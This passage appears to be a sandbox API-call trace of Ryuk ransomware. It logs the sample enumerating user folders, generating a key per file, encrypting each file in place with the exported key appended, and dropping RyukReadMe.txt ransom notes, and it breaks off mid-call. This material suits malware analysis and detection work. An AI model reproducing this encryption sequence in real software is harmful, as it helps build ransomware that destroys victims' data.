CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.745] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.745] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.745] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x85, lpOverlapped=0x0) returned 1 [0156.746] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.746] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x85, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x90) returned 1 [0156.746] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.746] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x90, lpOverlapped=0x0) returned 1 [0156.746] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.746] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.746] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.746] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.747] CloseHandle (hObject=0x18c) returned 1 [0156.763] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.767] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.767] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.767] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.767] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.767] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url", dwFileAttributes=0x80) returned 1 [0156.767] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.768] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=133) returned 1 [0156.768] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=133) returned 1 [0156.768] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.768] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.768] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.768] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x85, lpOverlapped=0x0) returned 1 [0156.771] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.771] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x85, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x90) returned 1 [0156.771] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.771] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x90, lpOverlapped=0x0) returned 1 [0156.771] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.771] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.771] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.771] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.771] CloseHandle (hObject=0x18c) returned 1 [0156.787] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.791] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.791] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.791] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0156.791] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0156.791] SetLastError (dwErrCode=0x0) [0156.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0156.792] GetLastError () returned 0x0 [0156.792] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0156.793] CloseHandle (hObject=0x188) returned 1 [0156.793] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.793] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0156.793] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0156.793] SetLastError (dwErrCode=0x0) [0156.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0156.793] GetLastError () returned 0xb7 [0156.793] CloseHandle (hObject=0x184) returned 1 [0156.793] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0156.793] SetLastError (dwErrCode=0x0) [0156.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0156.793] GetLastError () returned 0xb7 [0156.793] CloseHandle (hObject=0x184) returned 1 [0156.793] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0156.793] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.794] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.794] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.794] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.794] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.794] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0156.794] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0156.794] SetLastError (dwErrCode=0x0) [0156.794] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0156.794] GetLastError () returned 0x0 [0156.794] WriteFile (in: hFile=0x184, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad9a0*=0x320, lpOverlapped=0x0) returned 1 [0156.795] CloseHandle (hObject=0x184) returned 1 [0156.795] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0156.795] SetLastError (dwErrCode=0x0) [0156.795] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0156.795] GetLastError () returned 0xb7 [0156.795] CloseHandle (hObject=0x184) returned 1 [0156.795] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0156.795] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0156.795] SetLastError (dwErrCode=0x0) [0156.795] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0156.795] GetLastError () returned 0xb7 [0156.795] CloseHandle (hObject=0x184) returned 1 [0156.795] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0156.795] SetLastError (dwErrCode=0x0) [0156.795] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0156.796] GetLastError () returned 0xb7 [0156.796] CloseHandle (hObject=0x184) returned 1 [0156.796] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0156.796] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.796] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.796] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.796] SetLastError (dwErrCode=0x0) [0156.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0156.796] GetLastError () returned 0xb7 [0156.796] CloseHandle (hObject=0x188) returned 1 [0156.796] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GKd5-xI6Zfm9CUWabUmw\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0156.796] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.796] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.796] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.796] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GKd5-xI6Zfm9CUWabUmw\\hv2LDDq6wlJKv68.wav", dwFileAttributes=0x80) returned 1 [0156.797] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GKd5-xI6Zfm9CUWabUmw\\hv2LDDq6wlJKv68.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gkd5-xi6zfm9cuwabumw\\hv2lddq6wljkv68.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.797] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=83994) returned 1 [0156.797] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=83994) returned 1 [0156.797] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x146f8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.797] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0156.797] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.797] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.798] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.798] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.798] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1481a, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x1481a, lpOverlapped=0x0) returned 1 [0156.799] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.799] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x1481a, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x14820) returned 1 [0156.799] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.800] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14820, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x14820, lpOverlapped=0x0) returned 1 [0156.800] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.800] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.800] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.800] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.800] CloseHandle (hObject=0x18c) returned 1 [0156.815] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.821] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.821] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.821] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.821] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.821] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GKd5-xI6Zfm9CUWabUmw\\QUpYOLNZW.wav", dwFileAttributes=0x80) returned 1 [0156.822] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GKd5-xI6Zfm9CUWabUmw\\QUpYOLNZW.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gkd5-xi6zfm9cuwabumw\\qupyolnzw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.822] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=37356) returned 1 [0156.822] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=37356) returned 1 [0156.822] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x90ca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.822] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0156.823] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.823] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.823] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.823] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.823] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x91ec, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x91ec, lpOverlapped=0x0) returned 1 [0156.824] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.824] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x91ec, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x91f0) returned 1 [0156.824] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.824] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x91f0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x91f0, lpOverlapped=0x0) returned 1 [0156.825] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.825] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.825] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.825] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.825] CloseHandle (hObject=0x18c) returned 1 [0156.855] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.859] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.859] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.860] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.860] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.860] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GKd5-xI6Zfm9CUWabUmw\\TVvOUpoRwF.wav", dwFileAttributes=0x80) returned 1 [0156.860] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GKd5-xI6Zfm9CUWabUmw\\TVvOUpoRwF.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gkd5-xi6zfm9cuwabumw\\tvvouporwf.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.860] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=76213) returned 1 [0156.860] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=76213) returned 1 [0156.860] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x12893, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.860] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0156.861] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.861] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.861] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.861] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.861] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x129b5, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x129b5, lpOverlapped=0x0) returned 1 [0156.862] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.862] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x129b5, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x129c0) returned 1 [0156.863] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.863] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x129c0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: 